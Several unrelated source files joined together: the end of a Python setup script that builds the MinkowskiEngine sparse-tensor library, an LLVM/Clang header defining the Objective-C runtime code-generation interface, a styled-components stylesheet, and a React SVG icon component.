compile_args += [f"CUDA_HOME={CUDA_HOME}"]
if KEEP_OBJS:
print("\nUsing built objects")
BLAS_LIST = ["openblas", "mkl", "atlas", "blas"]
if not (BLAS is False): # False only when not set, str otherwise
assert BLAS in BLAS_LIST
libraries.append(BLAS)
if not (BLAS_INCLUDE_DIRS is False):
compile_args += [f"BLAS_INCLUDE_DIRS={BLAS_INCLUDE_DIRS}"]
if not (BLAS_LIBRARY_DIRS is False):
extra_link_args += [f"-Wl,-rpath,{BLAS_LIBRARY_DIRS}"]
else:
# find the default BLAS library
import numpy.distutils.system_info as sysinfo
# Search blas in this order
for blas in BLAS_LIST:
if "libraries" in sysinfo.get_info(blas):
BLAS = blas
libraries += sysinfo.get_info(blas)["libraries"]
break
else:
# BLAS not found
raise ImportError(
' \
\nBLAS not found from numpy.distutils.system_info.get_info. \
\nPlease specify BLAS with: python setup.py install --blas=openblas" \
\nfor more information, please visit https://github.com/StanfordVL/MinkowskiEngine/wiki/Installation'
)
print(f"\nUsing BLAS={BLAS}")
compile_args += ["BLAS=" + BLAS]
if "darwin" in platform:
extra_compile_args += ["-stdlib=libc++"]
if not KEEP_OBJS:
run_command("make", "clean")
run_command(*compile_args)
# Python interface
setup(
name="MinkowskiEngine",
version=find_version("MinkowskiEngine", "__init__.py"),
install_requires=["torch", "numpy"],
packages=["MinkowskiEngine", "MinkowskiEngine.utils", "MinkowskiEngine.modules"],
package_dir={"MinkowskiEngine": "./MinkowskiEngine"},
ext_modules=[
Extension(
name="MinkowskiEngineBackend",
include_dirs=[here, get_python_inc() + "/.."],
library_dirs=["objs"],
sources=["pybind/minkowski.cpp",],
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
],
cmdclass={"build_ext": BuildExtension},
author="Christopher Choy",
author_email="chrischoy@ai.stanford.edu",
description="a convolutional neural network library for sparse tensors",
long_description=read("README.md"),
long_description_content_type="text/markdown",
url="https://github.com/StanfordVL/MinkowskiEngine",
keywords=[
"pytorch",
"Minkowski Engine",
"Sparse Tensor",
"Convolutional Neural Networks",
"3D Vision",
"Deep Learning",
],
zip_safe=False,
classifiers=[
# https://pypi.org/classifiers/
"Environment :: Console",
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Intended Audience :: Other Audience",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: C++",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Multimedia :: Graphics",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: Scientific/Engineering :: Visualization",
],
python_requires=">=3.6",
)
|
//===----- CGObjCRuntime.h - Interface to ObjC Runtimes ---------*- C++ -*-===//
//
// The LLVM37 Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This provides an abstract class for Objective-C code generation. Concrete
// subclasses of this implement code generation for specific Objective-C
// runtime libraries.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM37_CLANG_LIB_CODEGEN_CGOBJCRUNTIME_H
#define LLVM37_CLANG_LIB_CODEGEN_CGOBJCRUNTIME_H
#include "CGBuilder.h"
#include "CGCall.h"
#include "CGValue.h"
#include "clang/AST/DeclObjC.h"
#include "clang/Basic/IdentifierTable.h" // Selector
namespace llvm37 {
class Constant;
class Function;
class Module;
class StructLayout;
class StructType;
class Type;
class Value;
}
namespace clang {
namespace CodeGen {
class CodeGenFunction;
}
class FieldDecl;
class ObjCAtTryStmt;
class ObjCAtThrowStmt;
class ObjCAtSynchronizedStmt;
class ObjCContainerDecl;
class ObjCCategoryImplDecl;
class ObjCImplementationDecl;
class ObjCInterfaceDecl;
class ObjCMessageExpr;
class ObjCMethodDecl;
class ObjCProtocolDecl;
class Selector;
class ObjCIvarDecl;
class ObjCStringLiteral;
class BlockDeclRefExpr;
namespace CodeGen {
class CodeGenModule;
class CGBlockInfo;
// FIXME: Several methods should be pure virtual but aren't to avoid the
// partially-implemented subclass breaking.
/// Implements runtime-specific code generation functions.
class CGObjCRuntime {
protected:
CodeGen::CodeGenModule &CGM;
CGObjCRuntime(CodeGen::CodeGenModule &CGM) : CGM(CGM) {}
// Utility functions for unified ivar access. These need to
// eventually be folded into other places (the structure layout
// code).
/// Compute an offset to the given ivar, suitable for passing to
/// EmitValueForIvarAtOffset. Note that the correct handling of
/// bit-fields is carefully coordinated by these two, use caution!
///
/// The latter overload is suitable for computing the offset of a
/// sythesized ivar.
uint64_t ComputeIvarBaseOffset(CodeGen::CodeGenModule &CGM,
const ObjCInterfaceDecl *OID,
const ObjCIvarDecl *Ivar);
uint64_t ComputeIvarBaseOffset(CodeGen::CodeGenModule &CGM,
const ObjCImplementationDecl *OID,
const ObjCIvarDecl *Ivar);
LValue EmitValueForIvarAtOffset(CodeGen::CodeGenFunction &CGF,
const ObjCInterfaceDecl *OID,
llvm37::Value *BaseValue,
const ObjCIvarDecl *Ivar,
unsigned CVRQualifiers,
llvm37::Value *Offset);
/// Emits a try / catch statement. This function is intended to be called by
/// subclasses, and provides a generic mechanism for generating these, which
/// should be usable by all runtimes. The caller must provide the functions
/// to call when entering and exiting a \@catch() block, and the function
/// used to rethrow exceptions. If the begin and end catch functions are
/// NULL, then the function assumes that the EH personality function provides
/// the thrown object directly.
void EmitTryCatchStmt(CodeGenFunction &CGF,
const ObjCAtTryStmt &S,
llvm37::Constant *beginCatchFn,
llvm37::Constant *endCatchFn,
llvm37::Constant *exceptionRethrowFn);
/// Emits an \@synchronize() statement, using the \p syncEnterFn and
/// \p syncExitFn arguments as the functions called to lock and unlock
/// the object. This function can be called by subclasses that use
/// zero-cost exception handling.
void EmitAtSynchronizedStmt(CodeGenFunction &CGF,
const ObjCAtSynchronizedStmt &S,
llvm37::Function *syncEnterFn,
llvm37::Function *syncExitFn);
public:
virtual ~CGObjCRuntime();
/// Generate the function required to register all Objective-C components in
/// this compilation unit with the runtime library.
virtual llvm37::Function *ModuleInitFunction() = 0;
/// Get a selector for the specified name and type values. The
/// return value should have the LLVM37 type for pointer-to
/// ASTContext::getObjCSelType().
virtual llvm37::Value *GetSelector(CodeGenFunction &CGF,
Selector Sel, bool lval=false) = 0;
/// Get a typed selector.
virtual llvm37::Value *GetSelector(CodeGenFunction &CGF,
const ObjCMethodDecl *Method) = 0;
/// Get the type constant to catch for the given ObjC pointer type.
/// This is used externally to implement catching ObjC types in C++.
/// Runtimes which don't support this should add the appropriate
/// error to Sema.
virtual llvm37::Constant *GetEHType(QualType T) = 0;
/// Generate a constant string object.
virtual llvm37::Constant *GenerateConstantString(const StringLiteral *) = 0;
/// Generate a category. A category contains a list of methods (and
/// accompanying metadata) and a list of protocols.
virtual void GenerateCategory(const ObjCCategoryImplDecl *OCD) = 0;
/// Generate a class structure for this class.
virtual void GenerateClass(const ObjCImplementationDecl *OID) = 0;
/// Register an class alias.
virtual void RegisterAlias(const ObjCCompatibleAliasDecl *OAD) = 0;
/// Generate an Objective-C message send operation.
///
/// \param Method - The method being called, this may be null if synthesizing
/// a property setter or getter.
virtual CodeGen::RValue
GenerateMessageSend(CodeGen::CodeGenFunction &CGF,
ReturnValueSlot ReturnSlot,
QualType ResultType,
Selector Sel,
llvm37::Value *Receiver,
const CallArgList &CallArgs,
const ObjCInterfaceDecl *Class = nullptr,
const ObjCMethodDecl *Method = nullptr) = 0;
/// Generate an Objective-C message send operation to the super
/// class initiated in a method for Class and with the given Self
/// object.
///
/// \param Method - The method being called, this may be null if synthesizing
/// a property setter or getter.
virtual CodeGen::RValue
GenerateMessageSendSuper(CodeGen::CodeGenFunction &CGF,
ReturnValueSlot ReturnSlot,
QualType ResultType,
Selector Sel,
const ObjCInterfaceDecl *Class,
bool isCategoryImpl,
llvm37::Value *Self,
bool IsClassMessage,
const CallArgList &CallArgs,
const ObjCMethodDecl *Method = nullptr) = 0;
/// Emit the code to return the named protocol as an object, as in a
/// \@protocol expression.
virtual llvm37::Value *GenerateProtocolRef(CodeGenFunction &CGF,
const ObjCProtocolDecl *OPD) = 0;
/// Generate the named protocol. Protocols contain method metadata but no
/// implementations.
virtual void GenerateProtocol(const ObjCProtocolDecl *OPD) = 0;
/// Generate a function preamble for a method with the specified
/// types.
// FIXME: Current this just generates the Function definition, but really this
// should also be generating the loads of the parameters, as the runtime
// should have full control over how parameters are passed.
virtual llvm37::Function *GenerateMethod(const ObjCMethodDecl *OMD,
const ObjCContainerDecl *CD) = 0;
/// Return the runtime function for getting properties.
virtual llvm37::Constant *GetPropertyGetFunction() = 0;
/// Return the runtime function for setting properties.
virtual llvm37::Constant *GetPropertySetFunction() = 0;
/// Return the runtime function for optimized setting properties.
virtual llvm37::Constant *GetOptimizedPropertySetFunction(bool atomic,
bool copy) = 0;
// API for atomic copying of qualified aggregates in getter.
virtual llvm37::Constant *GetGetStructFunction() = 0;
// API for atomic copying of qualified aggregates in setter.
virtual llvm37::Constant *GetSetStructFunction() = 0;
/// API for atomic copying of qualified aggregates with non-trivial copy
/// assignment (c++) in setter.
virtual llvm37::Constant *GetCppAtomicObjectSetFunction() = 0;
/// API for atomic copying of qualified aggregates with non-trivial copy
/// assignment (c++) in getter.
virtual llvm37::Constant *GetCppAtomicObjectGetFunction() = 0;
/// GetClass - Return a reference to the class for the given
/// interface decl.
virtual llvm37::Value *GetClass(CodeGenFunction &CGF,
const ObjCInterfaceDecl *OID) = 0;
virtual llvm37::Value *EmitNSAutoreleasePoolClassRef(CodeGenFunction &CGF) {
llvm37_unreachable("autoreleasepool unsupported in this ABI");
}
/// EnumerationMutationFunction - Return the function that's called by the
/// compiler when a mutation is detected during foreach iteration.
virtual llvm37::Constant *EnumerationMutationFunction() = 0;
virtual void EmitSynchronizedStmt(CodeGen::CodeGenFunction &CGF,
const ObjCAtSynchronizedStmt &S) = 0;
virtual void EmitTryStmt(CodeGen::CodeGenFunction &CGF,
const ObjCAtTryStmt &S) = 0;
virtual void EmitThrowStmt(CodeGen::CodeGenFunction &CGF,
const ObjCAtThrowStmt &S,
bool ClearInsertionPoint=true) = 0;
virtual llvm37::Value *EmitObjCWeakRead(CodeGen::CodeGenFunction &CGF,
llvm37::Value *AddrWeakObj) = 0;
virtual void EmitObjCWeakAssign(CodeGen::CodeGenFunction &CGF,
llvm37::Value *src, llvm37::Value *dest) = 0;
virtual void EmitObjCGlobalAssign(CodeGen::CodeGenFunction &CGF,
llvm37::Value *src, llvm37::Value *dest,
bool threadlocal=false) = 0;
virtual void EmitObjCIvarAssign(CodeGen::CodeGenFunction &CGF,
llvm37::Value *src, llvm37::Value *dest,
llvm37::Value *ivarOffset) = 0;
virtual void EmitObjCStrongCastAssign(CodeGen::CodeGenFunction &CGF,
llvm37::Value *src, llvm37::Value *dest) = 0;
virtual LValue EmitObjCValueForIvar(CodeGen::CodeGenFunction &CGF,
QualType ObjectTy,
llvm37::Value *BaseValue,
const ObjCIvarDecl *Ivar,
unsigned CVRQualifiers) = 0;
virtual llvm37::Value *EmitIvarOffset(CodeGen::CodeGenFunction &CGF,
const ObjCInterfaceDecl *Interface,
const ObjCIvarDecl *Ivar) = 0;
virtual void EmitGCMemmoveCollectable(CodeGen::CodeGenFunction &CGF,
llvm37::Value *DestPtr,
llvm37::Value *SrcPtr,
llvm37::Value *Size) = 0;
virtual llvm37::Constant *BuildGCBlockLayout(CodeGen::CodeGenModule &CGM,
const CodeGen::CGBlockInfo &blockInfo) = 0;
virtual llvm37::Constant *BuildRCBlockLayout(CodeGen::CodeGenModule &CGM,
const CodeGen::CGBlockInfo &blockInfo) = 0;
virtual llvm37::Constant *BuildByrefLayout(CodeGen::CodeGenModule &CGM,
QualType T) = 0;
virtual llvm37::GlobalVariable *GetClassGlobal(const std::string &Name,
bool Weak = false) = 0;
struct MessageSendInfo {
const CGFunctionInfo &CallInfo;
llvm37::PointerType *MessengerType;
MessageSendInfo(const CGFunctionInfo &callInfo,
llvm37::PointerType *messengerType)
: CallInfo(callInfo), MessengerType(messengerType) {}
};
MessageSendInfo getMessageSendInfo(const ObjCMethodDecl *method,
QualType resultType,
CallArgList &callArgs);
// FIXME: This probably shouldn't be here, but the code to compute
// it is here.
unsigned ComputeBitfieldBitOffset(CodeGen::CodeGenModule &CGM,
const ObjCInterfaceDecl *ID,
const ObjCIvarDecl *Ivar);
};
/// Creates an instance of an Objective-C runtime class.
//TODO: This should include some way of selecting which runtime to target.
CGObjCRuntime *CreateGNUObjCRuntime(CodeGenModule &CGM);
CGObjCRuntime *CreateMacObjCRuntime(CodeGenModule &CGM);
}
}
#endif
|
import styled from 'styled-components';
export const ContentContainer = styled.div`
display: flex;
justify-content: center!important;
margin-botton: 2rem;
`;
export const Form = styled.form`
flex: 0 0 80%;
max-width: 80%;
padding: 2rem 2rem 1rem 2rem;
border: solid 1px rgba(255, 129, 110, 0.4);
border-radius: .25rem;
text-align: center;
`;
|
import React from 'react';
import createSvgIcon from './utils/createSvgIcon';
export default createSvgIcon(
<React.Fragment><path d="M11.23 6c-1.66 0-3.22.66-4.36 1.73C6.54 6.73 5.61 6 4.5 6 3.12 6 2 7.12 2 8.5S3.12 11 4.5 11c.21 0 .41-.03.61-.08-.05.25-.09.51-.1.78-.18 3.68 2.95 6.68 6.68 6.27 2.55-.28 4.68-2.26 5.19-4.77.15-.71.15-1.4.06-2.06-.09-.6.38-1.13.99-1.13H22V6H11.23zM4.5 9c-.28 0-.5-.22-.5-.5s.22-.5.5-.5.5.22.5.5-.22.5-.5.5zm6.5 6c-1.66 0-3-1.34-3-3s1.34-3 3-3 3 1.34 3 3-1.34 3-3 3z" /><circle cx="11" cy="12" r="2" /></React.Fragment>
, 'SportsOutlined');
|